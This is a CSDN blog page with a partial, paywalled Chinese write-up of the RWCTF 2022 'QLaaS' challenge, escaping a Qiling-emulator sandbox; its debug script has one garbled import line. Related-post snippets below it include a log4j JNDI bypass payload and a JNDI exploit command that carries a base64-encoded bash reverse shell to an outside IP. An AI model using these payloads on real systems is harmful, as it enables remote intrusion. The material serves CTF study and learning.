rwctf2022_QLaaS

最新推荐文章于 2023-01-12 11:33:38 发布
最新推荐文章于 2023-01-12 11:33:38 发布
阅读量3.5k 收藏 1
点赞数 2
分类专栏: pwn 题目的整理 文章标签: linux 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wlz_lc_4/article/details/122925695
版权

rwctf2022 QLaaS

文章目录

main.py

首先题目文件只有一个main.py, 内容如下:

#!/usr/bin/env python3

import os
import sys
import base64
import tempfile
# pip install qiling==1.4.1
from qiling import Qiling

def my_sandbox(path, rootfs):
    ql = Qiling([path], rootfs)
    ql.run()

def main():
    sys.stdout.write('Your Binary(base64):\n')
    line = sys.stdin.readline()
    binary = base64.b64decode(line.strip())
    
    with tempfile.TemporaryDirectory() as tmp_dir:
        fp = os.path.join(tmp_dir, 'bin')

        with open(fp, 'wb') as f:
            f.write(binary)

        my_sandbox(fp, tmp_dir)

if __name__ == '__main__':
    main()

现获取文件,然后直接调用qiling框架运行它。这里显示是qiling=1.4.1, 也是目前的最新版本。

首先在github获取下来qiling的代码,然后切换到1.4.1版本,模仿上面的脚本编写一个简单的脚本:

#!/usr/bin/env python3

import os
import sys
import base64
# pip install qiling==1.4.1
c

def my_sandbox(path, rootfs):
    ql = Qiling([path], rootfs)
    ql.run()

def main():
    my_sandbox("/tmp/a/bin", "/tmp/a")

if __name__ == '__main__':
    main()

注意这里其实我没有安装qiling, 所以这个from qiling import Qiling其实会从当前路径进行查找,这里将这个脚本放到clone下来的qiling代码的目录下,会自动找到qiling文件夹,并使用其内的python文件,也可以开始调试了。

然后编写了一个exp.c,

#include <stdio.h>

int main() {
   
  printf("hellow\n");
  return 0;
}

尝试运行,发现这个报错。这个位置想载入动态链接库的时候, 尝试在本目录下载入ld文件失败,

image.png

可以看到原本想载入的文件是这个, 被限制在rootfs中了。

image.png

所以使用静态链接。

image.png

然后发现打印了运行过的syscall, qiling其实是封装的unicorn, 但是unicorn其实本身并没有实现sys call, 这些应该是qiling中实现的。

漏洞

transform_to_real_path

首先尝试直接启动shell,

int main() {
   
  execve("/bin/sh", 0, 0);
  return 0
最低0.47元/天 解锁文章
-令则
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2022 RWCTF PWN SVME
weixin_46483787的博客
01-23 858
前言:RWCTF上的一道clone-and-pwn,一开始没搞懂clone是啥子意思,后来队里师傅扔出来一个github链接,才明白原来是直接从github上拉下来的项目,还真是real word github项目地址:https://github.com/parrt/simple-virtual-machine-C/blob/master/src/vm.c 既然是clone就意味着有源码,有了源码对于做VM题来说就大大降低了我们的逆向难度。 逆向分析 说实话其实main.c在docker文件夹里似乎也给了
RWCTF2022 Trust_or_not 复现
weixin_51373492的博客
02-03 3407
RWCTF2022 Trust_or_not复现 RWCTF2022中有道逆向和TEE有关,准备复现一遍,顺便学习一下TEE。 TEE简介 TEE 全称叫做 Trust Executed Environment 可信执行系统,TEE 主要应用在手机以及 iot 设备上,比如用户的指纹识别以及支付相关的敏感操作都是在 TEE 中进行处理的,敏感的信息也是通过 TEE 加密之后存储在一个可信的位置。 TEE Feature TEE有几个特别的名词,在此进行说明 REE:指非安全系统,手机上指的就是Android
[RWCTF2022]DesperateCat(tomcat相关利用姿势)
weixin_43610673的博客
02-10 1170
关键词:el表达式、ASCII ZIP Jar、tomcat reload 、jsp编译过程中StringInterpreter执行、META-INF/resources/下文件加载进webResource 解压war包得到源码,一个上传功能,设置了编码为utf-8 写入的文件后缀可控、没有检查;但文件名不可控,会被替换为随机字符串;可指定文件的写入目录,且写入文件时如果文件所在的目录不存在,会递归进行父目录的创建,可进行目录穿越;写入的文件内容可控,且以字符串编码的形式写入(而非直接传递的字节流),但前后
2022RWCTF体验赛web的wp
qq_48511129的博客
01-24 1413
1.Digital Souvenir 兑换码 RealworldIsAwesome 2.log4flag 参考 https://le1a.gitee.io/posts/3e4e56bc/ 启动jndi服务 java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C “bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMDEuMzQuNDYuOTQvMTIzNDUgMD4mMQ==}|{base64,-d}|{bash,-
2022 Real World CTF体验赛Writeup
Keepb1ue的博客
01-23 7430
还是太菜了 不配打Real World正赛(神仙打架),打打体验赛压压惊。 log4flag 提示log4j,测试payload:${jndi:rmi://xxx.dnslog.cn/Exp} 存在检测,bypass payload:${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://xxx.xxx.xxx.xxx:1099/siavc8} 直接搭建jndi服务,尝试反弹shell flag:rwctf{d4b4b837f95542aa9
rwctf3rd-Re-Montagy
03-06
RealWorldCTF第三届总决赛-Re:Montagy 挑战 背景: 您好,我的经纪人告诉我,去年很多人解决了我的挑战,这很令人...$ docker build -t rwctf3rd-re-montagy . $ docker run -d --rm -p 0.0.0.0:10101:10101 --name=c
rwctf-2021-old-system
05-28
真实世界CTF 2021旧系统真实世界CTF(RWCTF)2021 Old System docker环境和写入。
Real-World-CTF-3rd-Challenge-Attachments:RWCTF 3rd的挑战附件
04-15
真实世界CTF-3挑战装备 RWCTF 3rd的挑战附件。
RWCTF21-VirtualBox-61-escape:0day VirtualBox 6.1.2适用于RealWorld CTF 20202021的转义
04-01
RWCTF21-VirtualBox-61-转义 0天RealBox CTF 2020/2021的VirtualBox 6.1 Escape 演示版 什么? 这是我们针对2020/2021年质量挑战赛真实世界CTF的“盒装逃生”挑战的解决方案。 目前为0天,但一旦有,我们将添加CVE...
writeup:CTF挑战撰写
05-28
欢迎阅读我们的文章! 自2018年以来,r3kapig是一个统一的CTF团队,主要来自Eur3kA和FlappyPig。 r3kapig是可以烧烤和烧烤的美味佳肴,团队的任务是为主人提供最美味的食物。 :P ...20210111-rwctf-
Real World CTF 2022 两道web题wp
yink12138的博客
02-09 4998
Hack into Skynet 给了源码,先审一下 #!/usr/bin/env python3 import flask import psycopg2 import datetime import hashlib from skynet import Skynet app = flask.Flask(__name__, static_url_path='') skynet = Skynet() def skynet_detect(): req = { 'method
CTF-web xman-2018 第八天 web 模板注入 序列化执行
iamsongyu的博客
01-05 3731
    python代码审计 php包容性更大的语言,针对web,简单一些所以大家用这个 python出现后,更加的中性一些,有更多的库,以其为技术基础的东西也很多,比如flask模板等。 企业中java多,但是不适合初学者,调用栈特别多,反序列化,表达式执行。   对于没遇到过的题目,要会收集信息,百度不行还是用谷歌。 学会用英文搜索,而且新很多,谷歌的高级技巧(定向搜索,源码搜...
2021年第一届 “东软杯”网络安全CTF竞赛-官方WriteUp(转)
渗透测试研究中心
12-22 2618
MISC1 签到难度 签到复制给出的flag输入即可2 range_download难度 中等flag{6095B134-5437-4B21-BE52-EDC46A276297}0x01分析dns流量,发现dns && ip.addr=1.1.1.1存在dns隧道数据,整理后得到base64:cGFzc3dvcmQ6IG5zc195eWRzIQ==解base64得到:passwo...
在运行的进程中添加执行系统调用
Chinese_big_boy的博客
08-30 381
这里先简单提一嘴,我们可以选地址范围为7fc0530b2000-7fc0530de000的libc的vma作为在目标进程执行系统调用的“中转”,也就是说,每次我们想要在目标进程中执行一个系统调用时,先将这个libc的vma对应的大小的内存保存起来,然后将程序写入这个vma起始位置,然后跳转到那个位置执行,最后,将第一步保存的代码写回到这个vma对应位置。为了简化注入的代码,我以注入最小的代码为例,注入一个系统调用,并让目标进程执行这个系统调用,如:打开一个文件、进程文件映射等。...
2023第五届 Real World CTF 体验赛 Writeup(web)
最新发布
一只爱吃橙子的羊
01-12 2487
2023第五届 Real World CTF 体验赛 Writeup(web)
Linux下/proc目录简介
weixin_34376562的博客
01-25 1388
Linux下/proc目录简介 1. /proc目录 Linux 内核提供了一种通过 /proc 文件系统,在运行时访问内核内部数据结构、改变内核设置的机制。proc文件系统是一个伪文件系统,它只存在内存当中,而不占用外存空间。它以文件系统的方式为访问系统内核数据的操作提供接口。 用户和应用程序可以通过proc得到系统的信息,并可以改变内核的某些参数。由于系统的信息,如...
取当前进程对应之静态映像文件的绝对路径/proc/self/exe
01-14 1590
提供一个linux  advanced programming 上的得到绝对路径目录的函数: char* get_self_executable_directory () {   int rval;   char link_target[1024];//目标地址   char* last_slash;   size_t result_length;//结果的长度   char* re
Linux用户空间将虚拟地址转化为物理地址
RToax
10-09 5242
内存由大量word或array组成,每个word或array都有与之关联的地址。现在,CPU的工作是从基于内存的程序计数器中获取指令。现在,这些指令可能会导致加载或存储到特定的存储器地址。地址绑定是从一个地址空间映射到另一地址空间的过程。逻辑地址是CPU在执行过程中生成的地址,而物理地址是指存储单元(已加载到内存中的单元)中的位置。请注意,用户仅处理逻辑地址(虚拟地址)。逻辑地址尤其由MMU或地址转换单元进行转换。该过程的输出是适当的物理地址或代码/数据在RAM中的位置。
PWN-COMPETITION-HGAME2022-Week2
P1umH0的博客
02-04 1789
PWN-COMPETITION-HGAME2022-Week2blind(unsolved)echo_severoldfashion_note blind(unsolved) echo_sever 堆上的格式化字符串漏洞 当输入的v0为0时,realloc(ptr,0)相当于free(ptr) 于是考虑将free_hook写为one-gadget # -*- coding:utf-8 -*- from pwn import * context.log_level="debug" io=process(".
/proc/self/目录的意义
热门推荐
dillanzhou的博客
09-28 1万+
我们都知道可以通过/proc/$pid/来获取指定进程的信息,例如内存映射、CPU绑定信息等等。如果某个进程想要获取本进程的系统信息,就可以通过进程的pid来访问/proc/$pid/目录。但是这个方法还需要获取进程pid,在fork、daemon等情况下pid还可能发生变化。为了更方便的获取本进程的信息,linux提供了/proc/self/目录,这个目录比较独特,不同的进程访问该目录时获得的信...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值